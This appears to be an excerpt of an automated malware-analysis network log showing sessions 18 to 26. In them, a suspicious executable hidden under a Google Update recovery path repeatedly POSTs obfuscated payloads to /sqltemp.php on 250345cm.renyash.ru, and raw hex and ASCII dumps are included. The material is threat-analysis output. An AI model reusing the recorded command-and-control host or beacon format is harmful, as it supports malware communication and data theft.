                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xhYboT85B3Fp8r3n5WDw0GWXGlB35vSRWmGxPgBBNoK0CljVFyU8RN09jrpETLohGC81Latt8jEMvb2s3vLKRfjVeGz%2FoPl9pZ3JkvbiDSCW17hOlPJekkFcJZAxAfIFpgJW2gGP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363fa3ada43ab-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4760&min_rtt=2240&rtt_var=5880&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=65178&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 56 29 13 29 0e 26 22 30 1e 28 3d 23 55 31 10 36 5d 28 01 32 59 27 2d 23 58 3d 39 2f 1e 22 2c 25 5b 24 28 3b 07 34 2e 2f 12 25 34 2b 59 05 1c 20 42 21 06 34 5f 29 5b 28 05 26 2c 29 59 24 3e 23 05 2a 38 3c 54 23 15 09 5e 33 04 3c 5b 2a 04 33 0e 27 2c 30 02 2f 2c 36 0c 26 3a 2c 54 00 11 26 57 30 0f 33 01 20 09 01 05 36 1f 31 5f 25 34 04 1a 24 2c 09 1b 37 00 2d 01 31 1c 27 5f 21 33 25 07 31 3b 2d 5c 34 03 2c 0a 3d 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%V))&"0(=#U16](2Y'-#X=9/",%[$(;4./%4+Y B!4_)[(&,)Y$>#*8<T#^3<[*3',0/,6&:,T&W03 61_%4$,7-1'_!3%1;-\4,=.%S -H?WS0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 62485 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:27.940432072 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:28.297775030 CET | 1124 | OUT | Data Raw: 53 57 5f 5c 54 50 54 51 58 56 52 59 56 5c 59 50 5b 58 54 50 55 5e 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_\TPTQXVRYV\YP[XTPU^P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y0)Z ?Y'-(;=U48*:+*X7#23?+6&7S::&Y.,Y-5
Jan 1, 2025 16:02:28.394246101 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:28.651349068 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ZAxmpP%2FiKBDXb3eRokpRaPpLWvQrffyCTFTjfTqtV4fLupW0EkWiT%2BGZJhokqSwhGBFNxmUceJ%2BGBdU%2B3end%2BCGk3llGBs75zni9cYsOwNdPJsHE0x3iVeCoANm%2FXlVsWUp2Kmj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363fb2e388c87-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8729&min_rtt=1979&rtt_var=14243&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=26079&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 62491 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:28.791610003 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
Jan 1, 2025 16:02:29.141484022 CET | 1124 | OUT | Data Raw: 56 54 5f 5d 54 50 54 57 58 56 52 59 56 51 59 50 5b 59 54 5b 55 5e 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VT_]TPTWXVRYVQYP[YT[U^P]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.['=Y7?1X'<.:.#.3+7W*4+X?(9&?7-*&Y.,Y-
Jan 1, 2025 16:02:29.234605074 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:29.491276026 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:29 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dkspYOrYTwhsutXI0T9bvnOTDiY0hx3v1tbNd4earlszUvykHV%2BtvIePaklC0cB81JNQoYGNwYOn%2BHyvKa5%2Bl7kQtwvJlUnn13Jq9rU9bnICAwgVGb2BbVA2iOdLUTnohiyiY8c%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364006a84c335-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6602&min_rtt=1616&rtt_var=10579&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=35171&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  20 | 192.168.2.6 | 62498 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:29.631804943 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:29.985229969 CET | 1124 | OUT | Data Raw: 56 52 5a 53 51 58 51 55 58 56 52 59 56 5e 59 53 5b 5a 54 58 55 58 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VRZSQXQUXVRYV^YS[ZTXUXPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3/*#!_$+.:=7>$*93>7 ++:$,;V9:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:30.106494904 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:30.294955969 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2Bpoa%2F7atg6TrlgOjzJBV%2FscUEsVYa82j2KI%2B9wfDyFRGpLOw2Cu%2FPR4iS6GVEkecRM5LHcy%2BfB5oeYHktsu0yc1SQuJS3nqC7EYeq0EiFZeND7sopHq9lkJpRBP46LXOAf7ngYy"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36405d83e43f7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8357&min_rtt=2446&rtt_var=12739&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=29355&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  21 | 192.168.2.6 | 62504 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:30.503562927 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:30.860203028 CET | 1124 | OUT | Data Raw: 56 55 5f 50 51 5b 51 56 58 56 52 59 56 5a 59 52 5b 5f 54 58 55 5e 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VU_PQ[QVXVRYVZYR[_TXU^P[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y0?6#=3 /\>#*)V*$Y4"?;%1/V9*&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:30.957477093 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:31.220752001 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rhfr1DQ%2BkTIoJGWR3g0Z5G6xdGL%2F%2Br46Bx6OHVCHU0501HGD3yw7cXwcG2fnm3YDeuWKQL7cODtyjVgJb6mu3qCzmdQ%2B7TPIxCErXdlM7sYmkHbkRxapxUnSbSpb3J%2BPnTzfccl6"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3640b3ddb421f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4820&min_rtt=2010&rtt_var=6375&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=59599&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  22 | 192.168.2.6 | 62511 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:31.363782883 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:31.719568014 CET | 1124 | OUT | Data Raw: 53 52 5f 55 54 58 51 56 58 56 52 59 56 5c 59 52 5b 5c 54 5b 55 5a 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SR_UTXQVXVRYV\YR[\T[UZPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0X41_',*!T#<^+94># *;5C1V.*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:31.808577061 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:32.077609062 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZS6XVbu4I4a0I%2B12Mqf%2B6X8bFwf0Bzg49EtY7s2Bpt8VB72qlsqpXooBIXuCiLQWMa4hZts44EcW%2BajrcORtycMPYp35rSQsEmXvmn%2FMnxiZpyykg1x7B2CICh2YyHzTFHZBOsjv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364108923c329-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=1658&rtt_var=1320&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=327942&cwnd=147&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  23 | 192.168.2.6 | 62519 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:32.223767042 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:32.580070019 CET | 1124 | OUT | Data Raw: 53 54 5f 52 54 5c 54 56 58 56 52 59 56 5a 59 56 5b 5d 54 5e 55 55 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: ST_RT\TVXVRYVZYV[]T^UUP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-'Y:4?*'.$.9!T!-$Y+9<). 2<E%?'S-:&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:32.677578926 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:32.945198059 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kkf1I1Zx1Dfg4aM13eZ0DyW%2FrTADTg0k4bM3HbSmQEVIDarg4f2HiqKjlCRUqNfeJdwzIin3PdZ5DJy04Lx2akOcbPjoy2DI6uqwXbjWixKdz0H79A8j4odppsvN%2BMpzBn2szvEC"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36415ff72efa1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4560&min_rtt=1965&rtt_var=5928&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=64235&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  24 | 192.168.2.6 | 62525 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:33.190606117 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  25 | 192.168.2.6 | 62528 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:33.444891930 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:33.797719002 CET | 1964 | OUT | Data Raw: 53 50 5a 56 54 50 54 5c 58 56 52 59 56 5e 59 53 5b 5e 54 51 55 58 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SPZVTPT\XVRYV^YS[^TQUXP\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-'[4]$4.9.7=$Z<94=-;42<*(%A&(-&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:33.899545908 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:34.165894985 CET | 959 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OevC1TkzlXRKJyU%2F3H1y%2B%2B9kXdw3T4cF71Um4%2F7MZ8e0STXrORgfY4K7Dtd54mEyj%2FMFbkOxYg4sx4YoZboEm1YBFhuDWm4ZccNduHWj0T3DJwzP%2BZhvMQBBJLMeLF8EPTp67trx"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3641d9f36c425-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3966&min_rtt=1490&rtt_var=5511&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=68538&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 51 2a 13 04 55 24 21 2b 02 3c 3d 06 0c 32 2d 36 58 2b 38 00 1a 27 3e 0d 5a 3d 29 20 04 21 05 3d 5f 25 28 01 06 20 3d 30 07 27 1e 2b 59 05 1c 23 1d 21 3f 24 5e 3d 04 27 5d 31 59 35 5a 27 10 0a 14 3f 3b 28 1e 23 05 30 03 24 3d 15 05 3d 03 30 57 24 2f 37 5b 2f 3c 32 0b 27 3a 2c 54 00 11 25 09 27 08 28 5f 20 09 05 03 35 32 36 03 25 1a 2a 1b 26 3c 02 09 23 29 22 15 26 22 06 02 22 55 2e 5a 31 15 0c 04 34 03 27 51 28 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%Q*U$!+<=2-6X+8'>Z=) !=_%( =0'+Y#!?$^=']1Y5Z'?;(#0$==0W$/7[/<2':,T%'(_ 526%*&<#)"&""U.Z14'Q(>%S -H?WS0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  26 | 192.168.2.6 | 62529 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:33.568968058 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:33.922678947 CET | 1124 | OUT | Data Raw: 53 50 5a 50 51 5b 54 50 58 56 52 59 56 5a 59 56 5b 52 54 5d 55 54 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SPZPQ[TPXVRYVZYV[RT]UTPUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0:#<=_33E/:=W7$_*:7=.( T7?;=C%?/-:&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:34.014158010 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:34.283144951 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
